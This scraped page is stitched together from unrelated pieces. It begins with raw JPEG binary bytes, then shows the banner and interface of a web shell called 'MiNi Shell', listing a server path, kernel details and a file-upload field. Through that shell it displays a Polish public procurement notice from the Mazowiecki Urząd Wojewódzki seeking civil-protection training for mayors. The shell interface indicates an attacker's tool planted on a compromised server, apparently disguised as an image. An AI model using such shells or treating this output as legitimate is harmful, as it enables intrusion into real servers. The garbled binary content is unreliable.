JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250410/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250410/0018532301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Przeprowadzenie szkolenia z zakresu ochrony ludności i obrony cywilnej dla wójtów, burmistrzów i prezydentów miast województwa mazowieckiego. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MAZOWIECKI URZĄD WOJEWÓDZKI W WARSZAWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013272620</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Bankowy 3/5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-950</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@mazowieckie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.mazowieckie.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przeprowadzenie szkolenia z zakresu ochrony ludności i obrony cywilnej dla wójtów, burmistrzów i prezydentów miast województwa mazowieckiego. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7b523a97-8790-4fa2-a5fa-fec557a0ba5c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00185323</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-04-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00129748/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.16 Przeprowadzenie szkolenia z zakresu ochrony ludności i obrony cywilnej dla wójtów, burmistrzów i prezydentów miast województwa mazowieckiego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7b523a97-8790-4fa2-a5fa-fec557a0ba5c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Komunikacja w postępowaniu odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”), z wyłączeniem<br/>składania ofert – sposób przygotowania i złożenia oferty wskazany jest w pkt 11.3 SWZ. Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto wykonawcy.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korzystanie z Platformy e-Zamówienia jest bezpłatne. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia, w tym minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia oraz informacje zamieszczone w zakładce „Centrum Pomocy”. Formularze do komunikacji umożliwiają dołączenie załącznika do przesyłanej<br/>wiadomości (przycisk &#34;dodaj załącznik”). W przypadku załączników opatrzonych kwalifikowanym podpisem elektronicznym, w zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) - dodaje się uprzednio podpisany dokument wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub - dokument z „wszytym” podpisem (typ wewnętrzny). Informacje,<br/>oświadczenia, wnioski, zawiadomienia lub dokumenty sporządza w postaci elektronicznej i przekazuje jako załącznik do „Formularza do komunikacji” lub jako tekst wpisany bezpośrednio do Formularza do komunikacji, w sposób umożliwiający ustalenie tożsamości osoby przekazującej. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e Zamówienia. Wszystkie wysłane i odebrane w<br/>postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych jest Wojewoda Mazowiecki reprezentowany przez<br/>Dyrektora Generalnego z siedzibą przy pl. Bankowym 3/5 w Warszawie. Można się z nim kontaktować w następujący sposób:<br/>listownie na adres: pl. Bankowy 3/5, 00-950 Warszawa; poprzez elektroniczną skrzynkę podawczą:/t6j4ljd68r/skrytka; poprzez email:<br/>info@mazowieckie.pl; telefonicznie: 22 695-69-95.<br/>2 Administrator wyznaczył Inspektora Ochrony Danych. Kontakt: iod@mazowieckie.pl lub listownie: Mazowiecki Urząd<br/>Wojewódzki w Warszawie, pl. Bankowy 3/5, 00-950 Warszawa.<br/>3 Przetwarzamy Pani/Pana dane osobowe na podstawie art. 6 ust. 1 lit. c RODO, w celu związanym z postępowaniem o udzielenie<br/>zamówienia publicznego.<br/>4 Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja<br/>postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy PZP.<br/>5 Przysługują Pani/Panu następujące uprawnienia: a) prawo dostępu do swoich danych oraz uzyskania ich kopii; b) prawo do<br/>sprostowania (poprawiania) swoich danych; c) prawo do usunięcia danych (jeżeli dane były pozyskane na podstawie wyrażenia<br/>zgody); d) prawo do przenoszenia danych; e) prawo do ograniczenia przetwarzania danych, przy czym odrębne przepisy<br/>mogą wyłączyć możliwość skorzystania z tego prawa. Aby skorzystać z powyższych praw należy skontaktować się z nami lub<br/>naszym inspektorem ochrony danych. f) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (ul. Stawki 2,<br/>00-193 Warszawa), jeśli uznacie Państwo, że przetwarzamy państwa dane niezgodnie z prawem.<br/>6 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy.<br/>7 Nie przetwarzamy Pani/Pana danych w sposób zautomatyzowany, w tym w formie profilowania.<br/>8 Nie przekazujemy Pani/Pana danych do państw trzecich lub organizacji międzynarodowych.<br/>9 Podanie przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z<br/>udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy<br/>PZP</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BOU-V.272.8.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przeprowadzenie szkolenia z zakresu ochrony<br/>ludności i obrony cywilnej dla wójtów, burmistrzów i prezydentów miast<br/>województwa mazowieckiego, dla maksymalnie 309 osób, realizowane zgodnie z Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji (dalej MSWiA) z dnia 6 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia (Dz. U. 2025 r. poz. 162).<br/>Przedmiot zamówienia będzie realizowany w poniższych lokalizacjach,<br/>zapewnianych przez Zamawiającego:<br/>1. Ciechanów:<br/>1) Sala konferencyjna w Delegaturze Mazowieckiego Urzędu<br/>Wojewódzkiego w Ciechanowie (ul. 17 Stycznia 60, 06-400<br/>Ciechanów),<br/>2) Sala konferencyjna w Miejskim Ośrodku Sportu i Rekreacji<br/>Ciechanów (ul. 17 Stycznia 60B, 06-400 Ciechanów),<br/>2. Ostrołęka:<br/>1) Sala konferencyjna w Delegaturze Mazowieckiego Urzędu<br/>Wojewódzkiego w Ostrołęce (ul. gen. Augusta Emila Fieldorfa<br/>„Nila” 15, 07-410 Ostrołęka),<br/>2) Sala konferencyjna w Urzędzie Miasta Ostrołęki (Plac gen. J Bema<br/>1, 07-410 Ostrołęka),<br/>3. Płock:<br/>1) Sala konferencyjna w Delegaturze Mazowieckiego Urzędu<br/>Wojewódzkiego w Płocku (ul. Kolegialna 15, 09-402 Płock),<br/>2) Sala konferencyjna w Starostwie Powiatowym w Płocku (ul. Bielska<br/>59, 09-400 Płock),<br/>4. Radom:<br/>1) Sala konferencyjna w Delegaturze Mazowieckiego Urzędu<br/>Wojewódzkiego w Radomiu (ul. Stefana Żeromskiego 53, 26-600<br/>Radom),<br/>2) Sala konferencyjna Urzędu Miejskiego w Radomiu (ul. Stefana<br/>Żeromskiego 53, 26-600 Radom),<br/>5. Siedlce:<br/>1) Sala konferencyjna w Delegaturze Mazowieckiego Urzędu<br/>Wojewódzkiego w Siedlcach (ul. Piłsudskiego 38, 08-110 Siedlce),<br/>2) Sala konferencyjna Kuratorium Oświaty w Siedlcach (ul.<br/>Piłsudskiego 38, 08-110 Siedlce),<br/>6. Warszawa (równolegle dla dwóch grup w dwóch terminach oraz jednej<br/>grupy w jednym terminie):<br/>1) Sale konferencyjne Mazowieckiego Urzędu Wojewódzkiego w<br/>Warszawie (pl. Bankowy 3/5, 00-950 Warszawa).<br/><br/>Opis Przedmiotu Zamówienia zawarty jest w Załączniku nr 1 do SWZ oraz PPU stanowiących Załącznik nr 2 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena (C) 60 % 60 pkt<br/>Liczba Wykładowców (L) 20 % 20 pkt<br/>3 Doświadczenie zawodowe osób<br/>prowadzących szkolenie zgodnie z § 11<br/>ust. 1 pkt 3 lit. a- c Rozporządzenia<br/>Ministra Spraw Wewnętrznych i<br/>Administracji z dnia 6 lutego 2025 r. w<br/>sprawie programów szkoleń z zakresu<br/>ochrony ludności i obrony cywilnej oraz<br/>wymagań dla podmiotów prowadzących<br/>szkolenia (D1)<br/>4 Doświadczenie zawodowe osób<br/>prowadzących szkolenie zgodnie z § 11<br/>ust. 1 pkt 3 lit. d Rozporządzenia Ministra<br/>Spraw Wewnętrznych i Administracji z dnia<br/>6 lutego 2025 r. w sprawie programów<br/>szkoleń z zakresu ochrony ludności i<br/>obrony cywilnej oraz wymagań dla<br/>podmiotów prowadzących szkolenia (D2)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba wykładowców</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób prowadzących szkolenie zgodnie z § 11 ust. 1 pkt 3 lit. a- c Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia (D1)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe osób prowadzących szkolenie zgodnie z § 11 ust. 1 pkt 3 lit. d Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 6 lutego 2025 r. w sprawie programów szkoleń z zakresu ochrony ludności i obrony cywilnej oraz wymagań dla podmiotów prowadzących szkolenia (D2)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> spełniają warunki udziału w postępowaniu dotyczące zdolności<br/>technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:<br/>1. w okresie 5 lat do dnia rozpoczęcia pierwszego szkolenia z zakresu<br/>ochrony ludności i obrony cywilnej prowadził studia, studia<br/>podyplomowe, szkolenie, kurs lub inną formę kształcenia w<br/>tematyce bezpieczeństwa narodowego, bezpieczeństwa<br/>wewnętrznego, zarządzania kryzysowego, ochrony ludności,obrony cywilnej lub ochrony infrastruktury krytycznej i przedstawi<br/>pisemne potwierdzenie spełniania tego wymagania;<br/>2. posiada co najmniej dwie osoby do prowadzenia zajęć<br/>dydaktycznych zatrudnione na podstawie stosunku pracy lub<br/>stosunku cywilno-prawnego, z których każda spełnia co najmniej<br/>jeden z poniższych warunków:<br/>1) posiada co najmniej stopień naukowy doktora w dyscyplinach<br/>naukowych w zakresie nauk o bezpieczeństwie, nauk o obronności, nauk wojskowych albo inżynierii bezpieczeństwa i wykazała dorobek naukowy związany z tematyką prowadzonych zajęć dydaktycznych w okresie ostatnich 5 lat oraz udokumentowane doświadczenie dydaktyczne,<br/>2) posiada tytuł zawodowy magistra inżyniera pożarnictwa i co<br/>najmniej 5 lat stażu pracy lub służby w jednostkach ochrony przeciwpożarowej lub komórkach organizacyjnych administracji<br/>publicznej związanych z ochroną ludności, obroną cywilną lub<br/>zarządzaniem kryzysowym oraz udokumentowane<br/>doświadczenie dydaktyczne;<br/>3) posiada tytuł zawodowy magistra lub magistra inżyniera na<br/>kierunku studiów związanym z bezpieczeństwem i co najmniej 5<br/>lat stażu pracy lub służby w komórkach organizacyjnych<br/>administracji publicznej związanych z ochroną ludności, obroną<br/>cywilną lub zarządzaniem kryzysowym oraz udokumentowane<br/>doświadczenie dydaktyczne;<br/>4) posiada udokumentowane doświadczenie dydaktyczne oraz co<br/>najmniej 10 lat stażu pracy lub służby w komórkach<br/>organizacyjnych administracji publicznej związanych z ochroną<br/>ludności, obroną cywilną lub zarządzaniem kryzysowym. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">9.1.1. Oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o<br/>braku przynależności do tej samej grupy kapitałowej w rozumieniu<br/>ustawy o ochronie konkurencji i konsumentów, z innym wykonawcą,<br/>który złożył odrębną ofertę, albo oświadczenia o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej. Wzór<br/>oświadczenia stanowi Załącznik nr 4 do SWZ.<br/>9.1.2. Oświadczenia Wykonawcy o aktualności informacji zawartych w<br/>Oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy oraz art. 7 ust 1<br/>ustawy UOBN z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz<br/>służących ochronie bezpieczeństwa narodowego, (Dz. U. 2024 poz. 507<br/>ze zm.), w zakresie podstaw wykluczenia z postępowania.<br/>Wzór oświadczenia stanowi Załącznik nr 5a do SWZ.<br/>9.1.3. Odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109<br/>ust. 1 pkt 4 ustawy, sporządzonej nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">9.1.4. Wykazu usług wykonanych, a w przypadku świadczeń powtarzających<br/>się lub ciągłych również wykonywanych, w okresie ostatnich 5 lat od dnia<br/>rozpoczęcia pierwszego szkolenia, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane lub są wykonywane, oraz załączeniem dowodów<br/>określających czy te usługi zostały wykonane lub są wykonywane<br/>należycie. Wzór wykazu stanowi. Załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta powinna zawierać:<br/>11.2.1. Formularz ofertowy stanowiący Załącznik nr 3 do SWZ<br/>(Zamawiający zastrzega, że formularz ofertowy należy złożyć na<br/>udostępnionym wzorze wypełniając dane pola zgodnie z<br/>szablonem druku, nie należy modyfikować merytorycznej treści<br/>zapisów określonych przez Zamawiającego);<br/>11.2.2. Oświadczenie stanowiące wstępne potwierdzenie, że wykonawca nie<br/>podlega wykluczeniu oraz spełnia warunki udziału w<br/>postępowaniu, zgodnie ze wzorem stanowiącym Załącznik nr 5 do<br/>SWZ;<br/>11.2.3. Pełnomocnictwo do reprezentowania Wykonawcy, w tym<br/>podpisania oferty, o ile prawo do podpisania oferty nie wynika 